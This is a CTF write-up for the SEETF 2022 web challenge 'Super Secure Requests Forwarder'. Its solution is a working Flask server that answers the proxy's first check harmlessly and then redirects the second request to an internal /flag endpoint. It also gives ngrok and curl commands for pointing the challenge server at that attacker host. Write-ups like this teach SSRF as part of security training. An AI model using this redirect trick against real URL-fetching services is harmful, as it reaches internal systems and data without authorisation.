Super-Secure-Requests-Forwarder

Writeup for Super Secure Requests Forwarder (Web) - Social Engineering Experts CTF (2022) 💜

Video Walkthrough

Description

Hide your IP address and take back control of your privacy! Visit websites through our super secure proxy.

Solution

from flask import Flask, redirect, request

# flask run
# ngrok http 5000
# curl -X POST -d "url=http://c0ac-81-103-153-174.ngrok.io/exploit" http://ssrf.chall.seetf.sg:1337/

app = Flask(__name__)
check = True

@app.route("/")
def index():
    return "<a href='https://www.youtube.com/c/CryptoCat23'>👀</a>"

@app.route("/exploit", methods=['GET', 'POST'])
def handle():
    global check
    if check:  # First request = benign
        check = False
        return "First request is benign, why wouldn't the second be?!"
    else:  # Second request = malicious
        check = True
        return redirect("http://127.0.0.1/flag", code=302)